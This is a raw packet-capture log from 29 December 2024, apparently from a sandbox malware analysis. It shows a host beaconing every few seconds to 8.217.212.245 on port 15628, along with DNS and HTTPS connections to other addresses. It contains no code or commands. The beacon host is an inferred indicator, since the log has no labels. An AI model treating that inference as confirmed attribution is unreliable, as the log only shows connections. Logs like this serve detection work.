                                                                                                                                                                                                  Dec 29, 2024 16:14:48.448549032 CET4976915628192.168.2.68.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:14:48.569484949 CET15628497698.217.212.245192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:14:48.569561005 CET4976915628192.168.2.68.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:14:48.571012974 CET4976915628192.168.2.68.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:14:48.691889048 CET15628497698.217.212.245192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:14:51.215719938 CET15628497698.217.212.245192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:14:51.215791941 CET4976915628192.168.2.68.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:14:51.216000080 CET4976915628192.168.2.68.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:14:51.336817026 CET15628497698.217.212.245192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:14:55.795254946 CET4978715628192.168.2.68.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:14:55.916182995 CET15628497878.217.212.245192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:14:55.916249990 CET4978715628192.168.2.68.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:14:55.917619944 CET4978715628192.168.2.68.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:14:56.038583040 CET15628497878.217.212.245192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:14:58.556817055 CET15628497878.217.212.245192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:14:58.556884050 CET4978715628192.168.2.68.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:14:58.556967974 CET4978715628192.168.2.68.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:14:58.677848101 CET15628497878.217.212.245192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:03.162355900 CET4980415628192.168.2.68.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:15:03.283221960 CET15628498048.217.212.245192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:03.283332109 CET4980415628192.168.2.68.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:15:03.291205883 CET4980415628192.168.2.68.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:15:03.412235975 CET15628498048.217.212.245192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:05.936537027 CET15628498048.217.212.245192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:05.936654091 CET4980415628192.168.2.68.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:15:05.938431978 CET4980415628192.168.2.68.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:15:06.059263945 CET15628498048.217.212.245192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:10.531624079 CET4982215628192.168.2.68.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:15:10.652540922 CET15628498228.217.212.245192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:10.652628899 CET4982215628192.168.2.68.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:15:10.654129028 CET4982215628192.168.2.68.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:15:10.774921894 CET15628498228.217.212.245192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:13.219131947 CET15628498228.217.212.245192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:13.219196081 CET4982215628192.168.2.68.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:15:13.219278097 CET4982215628192.168.2.68.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:15:13.340117931 CET15628498228.217.212.245192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:17.888427973 CET4984015628192.168.2.68.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:15:18.010370970 CET15628498408.217.212.245192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:18.010448933 CET4984015628192.168.2.68.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:15:18.011476040 CET4984015628192.168.2.68.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:15:18.132333040 CET15628498408.217.212.245192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:20.636187077 CET15628498408.217.212.245192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:20.636327028 CET4984015628192.168.2.68.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:15:20.636419058 CET4984015628192.168.2.68.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:15:20.757231951 CET15628498408.217.212.245192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:25.242157936 CET4985715628192.168.2.68.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:15:25.363111973 CET15628498578.217.212.245192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:25.363248110 CET4985715628192.168.2.68.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:15:25.464725018 CET4985715628192.168.2.68.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:15:25.585591078 CET15628498578.217.212.245192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:27.203567028 CET4986280192.168.2.618.136.85.30
                                                                                                                                                                                                  Dec 29, 2024 16:15:27.324348927 CET804986218.136.85.30192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:27.324431896 CET4986280192.168.2.618.136.85.30
                                                                                                                                                                                                  Dec 29, 2024 16:15:27.395387888 CET4986280192.168.2.618.136.85.30
                                                                                                                                                                                                  Dec 29, 2024 16:15:27.517062902 CET804986218.136.85.30192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:27.936021090 CET15628498578.217.212.245192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:27.936084986 CET4985715628192.168.2.68.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:15:27.936239958 CET4985715628192.168.2.68.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:15:28.057060957 CET15628498578.217.212.245192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:28.943716049 CET4986653192.168.2.68.8.8.8
                                                                                                                                                                                                  Dec 29, 2024 16:15:28.998764992 CET804986218.136.85.30192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.055139065 CET4986280192.168.2.618.136.85.30
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.064481020 CET53498668.8.8.8192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.064563990 CET4986653192.168.2.68.8.8.8
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.068079948 CET4986653192.168.2.68.8.8.8
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.088778019 CET49867443192.168.2.6172.217.21.36
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.088831902 CET44349867172.217.21.36192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.088896990 CET49867443192.168.2.6172.217.21.36
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.089180946 CET49869443192.168.2.6103.235.46.96
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.089214087 CET44349869103.235.46.96192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.089385033 CET49869443192.168.2.6103.235.46.96
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.096400023 CET49867443192.168.2.6172.217.21.36
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.096441984 CET44349867172.217.21.36192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.096664906 CET49867443192.168.2.6172.217.21.36
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.098151922 CET49869443192.168.2.6103.235.46.96
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.098201990 CET44349869103.235.46.96192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.098292112 CET49869443192.168.2.6103.235.46.96
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.189012051 CET53498668.8.8.8192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.189080954 CET4986653192.168.2.68.8.8.8
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.284972906 CET49871443192.168.2.677.88.55.88
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.284996986 CET4434987177.88.55.88192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.285193920 CET49871443192.168.2.677.88.55.88
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.300220966 CET49871443192.168.2.677.88.55.88
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.300283909 CET4434987177.88.55.88192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.300460100 CET49871443192.168.2.677.88.55.88
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.664639950 CET49876443192.168.2.623.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.664664984 CET4434987623.98.101.155192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.664748907 CET49876443192.168.2.623.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.673405886 CET49876443192.168.2.623.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.673428059 CET4434987623.98.101.155192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.700167894 CET804986218.136.85.30192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.751595974 CET4986280192.168.2.618.136.85.30
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.872473001 CET804986218.136.85.30192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:30.225080013 CET49877443192.168.2.613.227.9.24
                                                                                                                                                                                                  Dec 29, 2024 16:15:30.225123882 CET4434987713.227.9.24192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:30.225183010 CET49878443192.168.2.613.227.9.24
                                                                                                                                                                                                  Dec 29, 2024 16:15:30.225223064 CET4434987813.227.9.24192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:30.225248098 CET49877443192.168.2.613.227.9.24
                                                                                                                                                                                                  Dec 29, 2024 16:15:30.225270987 CET49878443192.168.2.613.227.9.24
                                                                                                                                                                                                  Dec 29, 2024 16:15:30.225440979 CET49879443192.168.2.613.227.9.24
                                                                                                                                                                                                  Dec 29, 2024 16:15:30.225459099 CET4434987913.227.9.24192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:30.225527048 CET49879443192.168.2.613.227.9.24
                                                                                                                                                                                                  Dec 29, 2024 16:15:30.258658886 CET49878443192.168.2.613.227.9.24
                                                                                                                                                                                                  Dec 29, 2024 16:15:30.258675098 CET4434987813.227.9.24192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:30.273610115 CET49877443192.168.2.613.227.9.24
                                                                                                                                                                                                  Dec 29, 2024 16:15:30.273631096 CET4434987713.227.9.24192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:30.274367094 CET49879443192.168.2.613.227.9.24
                                                                                                                                                                                                  Dec 29, 2024 16:15:30.274394989 CET4434987913.227.9.24192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:30.333457947 CET804986218.136.85.30192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:30.335833073 CET4986280192.168.2.618.136.85.30
                                                                                                                                                                                                  Dec 29, 2024 16:15:31.942890882 CET4434987623.98.101.155192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:31.942966938 CET49876443192.168.2.623.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:15:31.943612099 CET4434987623.98.101.155192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:31.943727016 CET49876443192.168.2.623.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:15:31.948213100 CET49876443192.168.2.623.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:15:31.948218107 CET4434987623.98.101.155192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:31.948472977 CET4434987623.98.101.155192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:31.948812008 CET49876443192.168.2.623.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:15:31.949167967 CET49885443192.168.2.68.223.59.119
                                                                                                                                                                                                  Dec 29, 2024 16:15:31.949198961 CET443498858.223.59.119192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:31.949259043 CET49885443192.168.2.68.223.59.119
                                                                                                                                                                                                  Dec 29, 2024 16:15:31.961760998 CET49885443192.168.2.68.223.59.119
                                                                                                                                                                                                  Dec 29, 2024 16:15:31.961774111 CET443498858.223.59.119192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:32.133656979 CET4434987913.227.9.24192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:32.133723974 CET49879443192.168.2.613.227.9.24
                                                                                                                                                                                                  Dec 29, 2024 16:15:32.136460066 CET49879443192.168.2.613.227.9.24
                                                                                                                                                                                                  Dec 29, 2024 16:15:32.136470079 CET4434987913.227.9.24192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:32.136605024 CET4434987913.227.9.24192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:32.136722088 CET49879443192.168.2.613.227.9.24
                                                                                                                                                                                                  Dec 29, 2024 16:15:32.179387093 CET4434987913.227.9.24192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:32.287182093 CET4434987813.227.9.24192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:32.287296057 CET49878443192.168.2.613.227.9.24
                                                                                                                                                                                                  Dec 29, 2024 16:15:32.301537037 CET49878443192.168.2.613.227.9.24
                                                                                                                                                                                                  Dec 29, 2024 16:15:32.301552057 CET4434987813.227.9.24192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:32.301671028 CET4434987813.227.9.24192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:32.301774979 CET49878443192.168.2.613.227.9.24
                                                                                                                                                                                                  Dec 29, 2024 16:15:32.301785946 CET4434987813.227.9.24192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:32.302772045 CET4434987713.227.9.24192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:32.302874088 CET49877443192.168.2.613.227.9.24
                                                                                                                                                                                                  Dec 29, 2024 16:15:32.306111097 CET49877443192.168.2.613.227.9.24
                                                                                                                                                                                                  Dec 29, 2024 16:15:32.306119919 CET4434987713.227.9.24192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:32.306194067 CET4434987713.227.9.24192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:32.306282043 CET49877443192.168.2.613.227.9.24
                                                                                                                                                                                                  Dec 29, 2024 16:15:32.319077969 CET49879443192.168.2.613.227.9.24
                                                                                                                                                                                                  Dec 29, 2024 16:15:32.319096088 CET4434987913.227.9.24192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:32.345839024 CET49878443192.168.2.613.227.9.24
                                                                                                                                                                                                  Dec 29, 2024 16:15:32.351330996 CET4434987713.227.9.24192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:32.440414906 CET49877443192.168.2.613.227.9.24
                                                                                                                                                                                                  Dec 29, 2024 16:15:32.440431118 CET4434987713.227.9.24192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:32.440469027 CET49879443192.168.2.613.227.9.24
                                                                                                                                                                                                  Dec 29, 2024 16:15:32.584064960 CET4988615628192.168.2.68.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:15:32.647674084 CET49877443192.168.2.613.227.9.24
                                                                                                                                                                                                  Dec 29, 2024 16:15:32.705033064 CET15628498868.217.212.245192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:32.705158949 CET4988615628192.168.2.68.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:15:32.707348108 CET4988615628192.168.2.68.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:15:32.828231096 CET15628498868.217.212.245192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:33.152110100 CET4434987913.227.9.24192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:33.152456999 CET4434987913.227.9.24192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:33.152741909 CET49879443192.168.2.613.227.9.24
                                                                                                                                                                                                  Dec 29, 2024 16:15:33.153026104 CET49879443192.168.2.613.227.9.24
                                                                                                                                                                                                  Dec 29, 2024 16:15:33.153050900 CET4434987913.227.9.24192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:33.317579031 CET4434987713.227.9.24192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:33.317671061 CET4434987713.227.9.24192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:33.317765951 CET49877443192.168.2.613.227.9.24
                                                                                                                                                                                                  Dec 29, 2024 16:15:33.330868006 CET49877443192.168.2.613.227.9.24
                                                                                                                                                                                                  Dec 29, 2024 16:15:33.330868006 CET49877443192.168.2.613.227.9.24
                                                                                                                                                                                                  Dec 29, 2024 16:15:33.330890894 CET4434987713.227.9.24192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:33.330903053 CET4434987713.227.9.24192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:33.485992908 CET4434987813.227.9.24192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:33.486113071 CET4434987813.227.9.24192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:33.486206055 CET49878443192.168.2.613.227.9.24
                                                                                                                                                                                                  Dec 29, 2024 16:15:33.501315117 CET49878443192.168.2.613.227.9.24
                                                                                                                                                                                                  Dec 29, 2024 16:15:33.501316071 CET49878443192.168.2.613.227.9.24
                                                                                                                                                                                                  Dec 29, 2024 16:15:33.501338005 CET4434987813.227.9.24192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:33.501351118 CET4434987813.227.9.24192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:34.276813030 CET443498858.223.59.119192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:34.276911020 CET49885443192.168.2.68.223.59.119
                                                                                                                                                                                                  Dec 29, 2024 16:15:34.279320002 CET49885443192.168.2.68.223.59.119
                                                                                                                                                                                                  Dec 29, 2024 16:15:34.279330969 CET443498858.223.59.119192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:34.279539108 CET443498858.223.59.119192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:34.279592991 CET49885443192.168.2.68.223.59.119
                                                                                                                                                                                                  Dec 29, 2024 16:15:34.280091047 CET49892443192.168.2.6183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:15:34.280122042 CET44349892183.60.146.66192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:34.280209064 CET49892443192.168.2.6183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:15:34.280765057 CET49892443192.168.2.6183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:15:34.280775070 CET44349892183.60.146.66192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:34.759424925 CET4986280192.168.2.618.136.85.30
                                                                                                                                                                                                  Dec 29, 2024 16:15:34.880429983 CET804986218.136.85.30192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:35.287369967 CET15628498868.217.212.245192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:35.287477970 CET4988615628192.168.2.68.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:15:35.288117886 CET4988615628192.168.2.68.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:15:35.408983946 CET15628498868.217.212.245192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:36.605973005 CET44349892183.60.146.66192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:36.606137991 CET49892443192.168.2.6183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:15:36.607878923 CET49892443192.168.2.6183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:15:36.607888937 CET44349892183.60.146.66192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:36.608051062 CET44349892183.60.146.66192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:36.608103037 CET49892443192.168.2.6183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:15:36.608762026 CET49900443192.168.2.68.223.56.120
                                                                                                                                                                                                  Dec 29, 2024 16:15:36.608808994 CET443499008.223.56.120192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:36.608874083 CET49900443192.168.2.68.223.56.120
                                                                                                                                                                                                  Dec 29, 2024 16:15:36.609472036 CET49900443192.168.2.68.223.56.120
                                                                                                                                                                                                  Dec 29, 2024 16:15:36.609483957 CET443499008.223.56.120192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:38.816972971 CET443499008.223.56.120192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:38.817060947 CET49900443192.168.2.68.223.56.120
                                                                                                                                                                                                  Dec 29, 2024 16:15:38.821178913 CET49900443192.168.2.68.223.56.120
                                                                                                                                                                                                  Dec 29, 2024 16:15:38.821188927 CET443499008.223.56.120192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:38.821391106 CET443499008.223.56.120192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:38.821438074 CET49900443192.168.2.68.223.56.120
                                                                                                                                                                                                  Dec 29, 2024 16:15:38.822288990 CET49906443192.168.2.635.227.223.56
                                                                                                                                                                                                  Dec 29, 2024 16:15:38.822346926 CET4434990635.227.223.56192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:38.822431087 CET49906443192.168.2.635.227.223.56
                                                                                                                                                                                                  Dec 29, 2024 16:15:38.823657990 CET49906443192.168.2.635.227.223.56
                                                                                                                                                                                                  Dec 29, 2024 16:15:38.823698044 CET4434990635.227.223.56192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:39.981065989 CET4990715628192.168.2.68.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:15:40.101902962 CET15628499078.217.212.245192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:40.102000952 CET4990715628192.168.2.68.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:15:40.103064060 CET4990715628192.168.2.68.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:15:40.223819971 CET15628499078.217.212.245192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:41.058602095 CET4434990635.227.223.56192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:41.058690071 CET49906443192.168.2.635.227.223.56
                                                                                                                                                                                                  Dec 29, 2024 16:15:41.058726072 CET4434990635.227.223.56192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:41.058805943 CET49906443192.168.2.635.227.223.56
                                                                                                                                                                                                  Dec 29, 2024 16:15:41.061343908 CET49906443192.168.2.635.227.223.56
                                                                                                                                                                                                  Dec 29, 2024 16:15:41.061358929 CET4434990635.227.223.56192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:41.061745882 CET4434990635.227.223.56192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:41.061821938 CET49906443192.168.2.635.227.223.56
                                                                                                                                                                                                  Dec 29, 2024 16:15:41.062464952 CET49913443192.168.2.623.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:15:41.062520027 CET4434991323.98.101.155192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:41.062617064 CET49913443192.168.2.623.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:15:41.063344955 CET49913443192.168.2.623.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:15:41.063364029 CET4434991323.98.101.155192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:42.681158066 CET15628499078.217.212.245192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:42.681226969 CET4990715628192.168.2.68.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:15:42.681335926 CET4990715628192.168.2.68.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:15:42.802150011 CET15628499078.217.212.245192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:43.328037024 CET4434991323.98.101.155192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:43.328119993 CET49913443192.168.2.623.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:15:43.328742027 CET4434991323.98.101.155192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:43.329149008 CET49913443192.168.2.623.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:15:43.352750063 CET49913443192.168.2.623.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:15:43.352771997 CET4434991323.98.101.155192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:43.352994919 CET4434991323.98.101.155192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:43.353621960 CET49913443192.168.2.623.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:15:43.357078075 CET49919443192.168.2.623.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:15:43.357100964 CET4434991923.98.101.155192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:43.357283115 CET49919443192.168.2.623.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:15:43.358558893 CET49919443192.168.2.623.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:15:43.358575106 CET4434991923.98.101.155192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:45.609571934 CET4434991923.98.101.155192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:45.609680891 CET49919443192.168.2.623.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:15:45.610238075 CET4434991923.98.101.155192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:45.610294104 CET49919443192.168.2.623.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:15:45.623852015 CET49919443192.168.2.623.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:15:45.623862982 CET4434991923.98.101.155192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:45.624098063 CET4434991923.98.101.155192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:45.624170065 CET49919443192.168.2.623.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:15:45.624995947 CET49926443192.168.2.623.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:15:45.625053883 CET4434992623.98.101.155192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:45.625158072 CET49926443192.168.2.623.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:15:45.626154900 CET49926443192.168.2.623.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:15:45.626176119 CET4434992623.98.101.155192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:46.955892086 CET49876443192.168.2.623.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:15:46.955909967 CET4434987623.98.101.155192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:47.442064047 CET4993215628192.168.2.68.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:15:47.562858105 CET15628499328.217.212.245192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:47.562937975 CET4993215628192.168.2.68.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:15:47.563971043 CET4993215628192.168.2.68.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:15:47.684855938 CET15628499328.217.212.245192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:47.877028942 CET4434992623.98.101.155192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:47.877111912 CET49926443192.168.2.623.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:15:47.877738953 CET4434992623.98.101.155192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:47.877780914 CET49926443192.168.2.623.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:15:47.880500078 CET49926443192.168.2.623.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:15:47.880511045 CET4434992623.98.101.155192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:47.880659103 CET4434992623.98.101.155192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:47.880698919 CET49926443192.168.2.623.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:15:47.881927967 CET49933443192.168.2.623.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:15:47.881952047 CET4434993323.98.101.155192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:47.882019997 CET49933443192.168.2.623.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:15:47.882616043 CET49933443192.168.2.623.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:15:47.882625103 CET4434993323.98.101.155192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:49.293138027 CET49885443192.168.2.68.223.59.119
                                                                                                                                                                                                  Dec 29, 2024 16:15:49.293157101 CET443498858.223.59.119192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:50.074239969 CET4434993323.98.101.155192.168.2.6
